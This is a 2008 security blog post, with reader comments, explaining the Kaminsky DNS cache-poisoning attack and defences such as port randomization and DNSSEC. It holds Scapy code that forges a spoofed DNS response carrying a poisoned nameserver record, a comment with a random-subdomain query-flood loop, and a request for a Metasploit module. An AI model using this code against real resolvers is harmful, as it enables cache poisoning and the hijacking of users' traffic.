Monday, July 21, 2008

Kaminsky's DNS Issue Accidentally Leaked?

[Update 2: Thomas Ptacek of Matasano has since posted a public apology to Dan et al. for the accidental posting: Regarding The Post On Chargen Earlier Today.]

[Update 1: Upon re-reading Halvar's explanation, it appears he got closer to it than I originally thought, missing only the part about "bailiwick checking", which prevents a request for arbitrary.invisibledenizen.org from poisoning ns1.google.com. Halvar's solution, as written, would fail as I understand it, but one minor change (using subdomains) makes it all work.]

It appears Matasano posted an explanation of Dan Kaminsky's DNS issue to their blog today, but it looks like it may have been yanked back down. My Google Reader account nabbed it via the RSS feed while it was up.

It looks like maybe they had this typed up, ready to hit "post" as soon as someone else figured it out? They had advance knowledge of the issue via conference calls with Kaminsky, and when Halvar Flake posted some speculation on what the issue was, they referred to Halvar's post and their explanation hit the Matasano blog. But Halvar's speculation was not the full issue, only a rehash of previously known issues. Halvar's ideas were close, but incomplete. Matasano filled in the missing details, possibly by accident. :)

Rather than re-post their entire section and get crossways with copyright complaints, here's a summary of their explanation:

  1. There's a general principle of cryptography that says if you have to guess Variable A, it's incredibly helpful to be able to generate as many instances of Variable A as possible. (See Wikipedia's entry on "birthday attack" or Google for more details.)
  2. DNS uses only a random 16-bit transaction ID that must be guessed in order to poison a DNS server's cache, and it must be guessed before the legitimate answer comes back. This is difficult to do for any individual request.
  3. If you can slam a server with tons of requests, Point 1 above comes into play and allows you to reliably and quickly get at least one DNS cache poisoning packet to match the transaction ID. (Halvar's guess said this: force requests for random0000001.com, random0000002.com, etc., to generate a large number of Variable A's. Eventually you'll guess one right.)
  4. This is obviously not very helpful on its own. So what if I can poison bankofamerica349543.com?
  5. OK, so what about DNS wildcards? If you are able to poison random00001.invisibledenizen.org, what does that get you? Enter the additional RR set field. This allows you to piggyback additional DNS responses on top of what was requested. For security reasons, you can only respond with additional answers for addresses within the same domain. (E.g., if I submit a request for arbitrary.domain.com, the additional response section can only return info for domain.com subdomains.)
  6. So the attack is this: do the above to cache poison randomXXXX.invisibledenizen.org, and in each packet have the additional RR return answers for ns1.invisibledenizen.org. Whenever random42156.invisibledenizen.org is the magical response that matches the transaction ID and poisons the cache, it will also poison the record for my nameserver, ns1.invisibledenizen.org. (A rough sketch of such a forged response follows below.)
Matasano stated this attack could occur in "less than 10 seconds" at current Internet speeds.
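
For the curious, here's a rough sketch in Python with Scapy of what one of those forged responses might look like. All of the IPs, names, and the guessed transaction ID are made up for illustration, and a real attempt would spray thousands of these, one per candidate ID, while the resolver is still waiting on its own query:

    # Hypothetical sketch only: illustrative IPs, names, and transaction ID, not a working exploit.
    from scapy.all import IP, UDP, DNS, DNSQR, DNSRR, send

    resolver_ip   = "192.0.2.53"     # victim recursive resolver (made up)
    auth_ns_ip    = "198.51.100.2"   # the real authoritative NS being impersonated (made up)
    resolver_port = 53               # pre-patch, many resolvers queried from a predictable port
    guessed_txid  = 0xBEEF           # one guess out of the 65,536 possible transaction IDs

    qname = "random42156.invisibledenizen.org"

    forged = (
        IP(src=auth_ns_ip, dst=resolver_ip) /
        UDP(sport=53, dport=resolver_port) /
        DNS(
            id=guessed_txid, qr=1, aa=1,
            qd=DNSQR(qname=qname, qtype="A"),
            # The answer for the throwaway name nobody cares about...
            an=DNSRR(rrname=qname, type="A", ttl=86400, rdata="203.0.113.7"),
            # ...and the additional RR that does the real damage: an in-bailiwick
            # record for ns1.invisibledenizen.org pointing wherever the attacker likes.
            ar=DNSRR(rrname="ns1.invisibledenizen.org", type="A", ttl=86400,
                     rdata="203.0.113.66"),
        )
    )

    send(forged, verbose=0)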

Anyone want to throw together a metasploit aux module for this?

:)

-N

10 comments:

Anonymous said...

Could be wrong, but I don't think this is it. You shouldn't be able to send these extra RRs in your reply (at least they shouldn't be accepted). It also doesn't seem to match up with the little that Kaminsky has said about the bug so far.

Anonymous said...

http://beezari.livejournal.com/141796.html

Sergiu said...

Hello!

What is the NEW vulnerability? The birthday attack (easy to carry out for 16 bits, as the key space is practically non-existent given current processing power, with 2^15 guesses needed on average for success), multiple DNS queries, and the extra RRs in the reply are not new!
Sergiu
www.sergiuzaharia.ro

Nathan Keltner said...

@sergiu: The newness of the attack really boils down to utilizing subdomains instead of domain names. The initial cache poisoning attack used the additional RR sets to poison off-site/out-of-bailiwick records. E.g., a spoof for random234ds34.com would poison ns1.google.com.

Dan realized (apparently, he's still mum on details until Black Hat) that you could get around bailiwick checking by using subdomains instead of domains.
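
To make that concrete, here's a tiny, deliberately simplified Python sketch of the bailiwick rule a resolver applies before caching an additional record (the function and zone handling are my own illustration, not any particular resolver's code):

    # Deliberately simplified illustration of a bailiwick check; real resolvers
    # track the delegated zone more carefully than this.
    def in_bailiwick(record_name: str, zone: str) -> bool:
        """Cache an additional record only if it sits at or under the zone
        that answered the query."""
        record_name = record_name.rstrip(".").lower()
        zone = zone.rstrip(".").lower()
        return record_name == zone or record_name.endswith("." + zone)

    # A query for arbitrary.invisibledenizen.org is answered by invisibledenizen.org:
    print(in_bailiwick("ns1.google.com", "invisibledenizen.org"))            # False: rejected
    print(in_bailiwick("ns1.invisibledenizen.org", "invisibledenizen.org"))  # True: cached

That check is what sinks the off-bailiwick version of the attack, and it's exactly what targeting a sibling name inside the same zone slips past.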

It does sound like Dan's got some more exciting stuff to show during his talk, and at a minimum I'm interested in hearing his stories from working with so many different vendors -- that sounds like a nightmare.

Bilbo Fraggins said...

@sergiu:
In the bad old days, if a recursive resolver requested the IP for yahoo.com, the DNS servers for yahoo could return results for microsoft.com as well, and the results would be accepted by the resolver.
They patched that, but poorly, so that a reply to a request for biteme.microsoft.com could also include the address for microsoft.com (or potentially www.microsoft.com; I haven't verified the extent of the problem personally yet).
The upside is you get practically infinite chances to poison the cache instead of only one. That's a pretty big finding, and changes the nature of the game.
The new defense of port randomization only buys us a limited time, through an additional 15-16 bits of randomness, assuming the implementation didn't mess up the random number generator (like we have about 5 times before).
The real fix is DNSSEC (or potentially increasing the query ID to something like a 128-256 bit number).
DNSSEC is complex, perhaps hopelessly so, and roll out will take a while even when the TLDs support it.
Source port randomization at best moves the vulnerability back into the "known broken" class from its newly discovered "broken by your grandmother" status.
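
To put rough numbers on that, here's a back-of-the-envelope Python calculation comparing a 16-bit transaction ID alone against transaction ID plus a randomized source port (the spoofed-packets-per-second figure is only a guess for illustration):

    # Back-of-the-envelope math; the spoofed-replies-per-second figure is only a guess.
    spoofed_per_sec = 50_000                # forged responses an attacker might push at a resolver

    txid_only      = 2 ** 16                # 65,536 possible transaction IDs
    txid_plus_port = 2 ** 16 * 2 ** 16      # ~4.3 billion combos with ~16 extra bits from the port

    for label, space in (("TXID only", txid_only), ("TXID + source port", txid_plus_port)):
        expected = space / 2                # on average you hit it halfway through the space
        print(f"{label}: ~{expected:,.0f} guesses, "
              f"~{expected / spoofed_per_sec:,.1f} seconds at {spoofed_per_sec:,} pkts/sec")

At that (made-up) rate the 16-bit-only case falls in under a second, while the extra port bits push the average into hours, which is exactly the "limited time" point above.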

Anonymous said...

I am wondering if this attack was used by NetDevilz back on 06.27.2008.

http://tinyurl.com/693o5r

The timeline of that attack and Dan's find/announcement is peculiar.

Though I could be way off base.

Nathan Keltner said...

@anon I don't think that was it, because it appears from the screenshot that they actually changed the DNS server names in the whois records. The attack we think Kaminsky found is one where you change the IP address associated with the DNS server listed in the whois record and in the core Internet DNS servers.

Sergiu said...

Thanks Natron and Steve for details!
My feeling is that a perfect RNG is not a solution, as the key space is limited to a maximum of 2^32 (if port randomization is enabled).
That's why I suppose that Steve's 128-256 bit number for the TID will really put malicious hackers in the cryptanalyst's position! A 256-bit key is practically impossible to brute-force with usual resources. However, this will "contribute" to more traffic used for DNS.
I hope that some brilliant DNS experts will find a way to disallow the other half of the vulnerability: additional RRs for out-of-bailiwick records, because RNGs are not easy to implement in software.

Anonymous said...

"Anyone want to throw together a metasploit aux module for this?"

Your wish is my command... svn up.

Anonymous said...

So... for us neophytes who don't understand all this technobabble - basically, you can ask any DNS server to do a lookup for you. There is a transaction ID (16 bits) used for validation of the response. If you flood the DNS server with lookups for subdomains of a domain that has a wildcard DNS entry, you have time to guess the transaction ID (16 bits = only 65,536 possibilities) and therefore spoof the response. The DNS server then saves the response until the time-to-live (TTL) expires.

Right?
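
If so, the flooding half might look something like this toy sketch (Python with Scapy, a made-up resolver address, and the invisibledenizen.org placeholder from the post); each cache miss opens another window to win the transaction ID race, assuming the resolver will do recursion for you:

    # Toy sketch of the query-flood half; the resolver IP is a placeholder and
    # this assumes the resolver will perform recursion for the sender.
    import random
    from scapy.all import IP, UDP, DNS, DNSQR, send

    resolver_ip = "192.0.2.53"   # victim recursive resolver (made up)

    for _ in range(1000):
        # Each never-before-seen name forces a fresh upstream lookup,
        # and each lookup is another chance to win the transaction ID race.
        qname = f"random{random.randint(0, 9999999):07d}.invisibledenizen.org"
        query = (
            IP(dst=resolver_ip) /
            UDP(dport=53) /
            DNS(rd=1, qd=DNSQR(qname=qname, qtype="A"))
        )
        send(query, verbose=0)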

It is my understanding that the root servers can't be spoofed. Those are specific IPs reserved exclusively for DNS. The only real way to guarantee a legitimate IP address is to do a full trace from the root server to the target DNS server that houses the domain. But that approach defeats the whole idea of decentralizing DNS.

Important sites like Google, Yahoo, etc. should be on some sort of special list with pre-determined IPs that are retrieved by ISPs directly from the root servers (and, in turn, all clients pull the list from the ISP). Basically, the top 500 sites that people visit, plus whatever organizations can afford some sort of significant fee to be on the list. That would solve the majority of this problem. The DNS-to-IP mapping then becomes read-only and should require something close to an "Act of God" to change. This approach also helps solve another problem - what to do if DNS ever becomes unavailable (e.g. nuclear attack... assuming, of course, the Internet is still functional at that point)? I could build my own personal list, but that seems like a lot of unnecessary work.

Then again, I only barely understand DNS. These are just a few things that have crossed my mind.